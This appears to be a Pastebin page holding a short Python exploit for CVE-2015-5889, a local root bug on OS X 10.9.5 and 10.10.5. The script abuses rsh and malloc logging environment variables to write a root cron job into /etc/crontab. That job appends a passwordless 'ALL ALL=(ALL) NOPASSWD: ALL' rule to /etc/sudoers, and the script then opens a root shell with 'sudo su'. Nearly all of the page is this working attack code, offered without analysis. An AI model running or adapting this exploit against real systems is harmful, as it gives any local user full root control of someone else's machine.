SHARE
TWEET

nullbyte

a guest May 25th, 2016 1,226 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1.  
  2. # CVE-2015-5889: issetugid() + rsh + libmalloc osx local root
  3. # tested on osx 10.9.5 / 10.10.5
  4. # jul/2015
  5. # by rebel
  6.  
  7. import os,time,sys
  8.  
  9. env = {}
  10.  
  11. s = os.stat("/etc/sudoers").st_size
  12.  
  13. env['MallocLogFile'] = '/etc/crontab'
  14. env['MallocStackLogging'] = 'yes'
  15. env['MallocStackLoggingDirectory'] = 'a\n* * * * * root echo "ALL ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers\n\n\n\n\n'
  16.  
  17. sys.stderr.write("creating /etc/crontab..")
  18.  
  19. p = os.fork()
  20. if p == 0:  
  21.     os.close(1)
  22.     os.close(2)
  23.     os.execve("/usr/bin/rsh",["rsh","localhost"],env)
  24.  
  25. time.sleep(1)
  26.  
  27. if "NOPASSWD" not in open("/etc/crontab").read():
  28.     sys.stderr.write("failed\n")
  29.     sys.exit(-1)
  30.  
  31. sys.stderr.write("done\nwaiting for /etc/sudoers to change (<60 seconds)..")
  32.  
  33. while os.stat("/etc/sudoers").st_size == s:
  34.     sys.stderr.write(".")  
  35.     time.sleep(1)
  36.  
  37. sys.stderr.write("\ndone\n")
  38.  
  39. os.system("sudo su")
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top